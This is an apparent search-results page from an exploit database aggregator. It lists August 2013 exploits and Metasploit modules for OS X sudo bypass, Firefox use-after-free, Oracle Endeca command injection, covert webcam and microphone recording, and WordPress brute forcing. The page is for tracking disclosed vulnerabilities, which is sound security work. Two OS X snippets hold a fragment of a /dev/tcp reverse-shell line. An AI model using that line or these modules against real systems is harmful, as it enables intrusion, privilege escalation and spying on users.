Lucene search
+L

13859 matches found

exploitpack
exploitpack
added 2013/08/30 12:00 a.m.17 views

Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)

Apple Mac OSX 10.8.4 - Local Privilege Escalation Python !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port pri...

0.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2013/08/30 12:00 a.m.66 views

Apple Mac OSX 10.8.4 - Local Privilege Escalation

!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port print """...

6.9CVSS7.8AI score0.03176EPSS
SaveExploits9
Metasploit
Metasploit
added 2013/08/29 6:37 p.m.58 views

OS X Gather Mac OS X Password Hash Collector

This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rexml/document' class MetasploitModule 'OS X Gather Mac OS X Passwo...

7.3AI score
SaveExploits0
ThreatPost
ThreatPost
added 2013/08/29 1:28 p.m.50 views

Metasploit Module Adds Sudo Vulnerability for OS X

Attackers looking to exploit a previously disclosed and apparently still unpatched bug in sudo, a Unix-based Linux command found in most Apple OS X builds have gotten a little more help this week. As Threatpost reported in March, the vulnerability CVE-2013-1775 can essentially set back the...

6.9CVSS7.8AI score0.03176EPSS
SaveExploits9References5
Packet Storm
Packet Storm
added 2013/08/29 12:00 a.m.51 views

Firefox XMLSerializer Use After Free

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Firefox...

9.3CVSS9.2AI score0.51324EPSS
SaveExploits8
zdt
zdt
added 2013/08/29 12:00 a.m.85 views

Firefox XMLSerializer Use After Free Vulnerability

This Metasploit module exploits a vulnerability found on Firefox 17.0 'Firefox XMLSerializer Use After Free', 'Description' = %q This module exploits a vulnerability found on Firefox 17.0 MSFLICENSE, 'Author' = 'regenrecht', Vulnerability Discovery, Analysis and PoC...

9.3CVSS9.3AI score0.51324EPSS
SaveExploits8
Exploit DB
Exploit DB
added 2013/08/29 12:00 a.m.37 views

Mozilla Firefox - XMLSerializer Use-After-Free (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Firefox...

9.3CVSS8.5AI score0.51324EPSS
SaveExploits8
Exploit DB
Exploit DB
added 2013/08/29 12:00 a.m.318 views

SPIP - 'connect' PHP Injection (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'SPIP connect Parameter PHP Injection'...

5.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2013/08/29 12:00 a.m.133 views

Apple Mac OSX - Sudo Password Bypass (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'shellwords' class Metasploit3 'Mac OS X Sudo Password Bypass',...

6.9CVSS7.8AI score0.03176EPSS
SaveExploits9
zdt
zdt
added 2013/08/29 12:00 a.m.45 views

VMWare Setuid vmware-mount Unsafe popen(3)

VMWare Workstation up to and including 9.0.2 build-1031769 and Player have a setuid executable called vmware-mount that invokes lsbrelease in the PATH with popen3. Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an...

6.9CVSS0.7AI score0.04638EPSS
SaveExploits5
zdt
zdt
added 2013/08/27 12:00 a.m.98 views

Mac OS X Sudo Password Bypass Vulnerability

This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges the user is in the sudoers file and is...

6.9CVSS7.9AI score0.03176EPSS
SaveExploits9
Exploit DB
Exploit DB
added 2013/08/26 12:00 a.m.45 views

Oracle Endeca Server - Remote Command Execution (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Oracle Endeca Server Remote Command...

5.5CVSS5.2AI score0.5984EPSS
SaveExploits8
zdt
zdt
added 2013/08/25 12:00 a.m.54 views

Oracle Endeca Server Remote Command Execution Vulnerability

This Metasploit module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On...

5.5CVSS6.8AI score0.5984EPSS
SaveExploits8
Packet Storm
Packet Storm
added 2013/08/24 12:00 a.m.42 views

Oracle Endeca Server Remote Command Execution

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Oracle Endeca Server Remote Command...

5.5CVSS0.1AI score0.5984EPSS
SaveExploits8
Metasploit
Metasploit
added 2013/08/23 8:38 p.m.52 views

OSX Manage Record Microphone

This module will allow the user to detect with the LIST action and capture with the RECORD action audio inputs on a remote OSX machine. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'shellwords' class...

7AI score
SaveExploits0
Metasploit
Metasploit
added 2013/08/23 8:38 p.m.60 views

OSX Manage Webcam

This module will allow the user to detect installed webcams with the LIST action, take a snapshot with the SNAPSHOT action, or record a webcam and mic with the RECORD action This module requires Metasploit: https://metasploit.com/download Current source:...

7.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2013/08/22 12:00 a.m.51 views

Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit4 'Foreman Red Hat OpenStack/Satellite...

6CVSS5.2AI score0.20934EPSS
SaveExploits4
Metasploit
Metasploit
added 2013/08/22 12:00 a.m.70 views

VMWare Setuid vmware-mount Unsafe popen(3)

VMWare Workstation up to and including 9.0.2 build-1031769 and Player have a setuid executable called vmware-mount that invokes lsbrelease in the PATH with popen3. Since PATH is user-controlled, and the default system shell on Debian-derived distributions does not drop privs, we can put an...

6.9CVSS5.6AI score0.04638EPSS
SaveExploits5
Packet Storm
Packet Storm
added 2013/08/22 12:00 a.m.25 views

ALLMediaServer 0.95 Buffer Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'ALLMediaServer 0....

1.2AI score
SaveExploits0
Metasploit
Metasploit
added 2013/08/21 10:45 a.m.49 views

WordPress Brute Force and User Enumeration Utility

WordPress Authentication Brute Force and User Enumeration Utility This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Brute Force and User Enumeration Utility', 'Description' = 'WordPress...

5CVSS7.1AI score0.85EPSS
SaveExploits14
Rows per page
Query Builder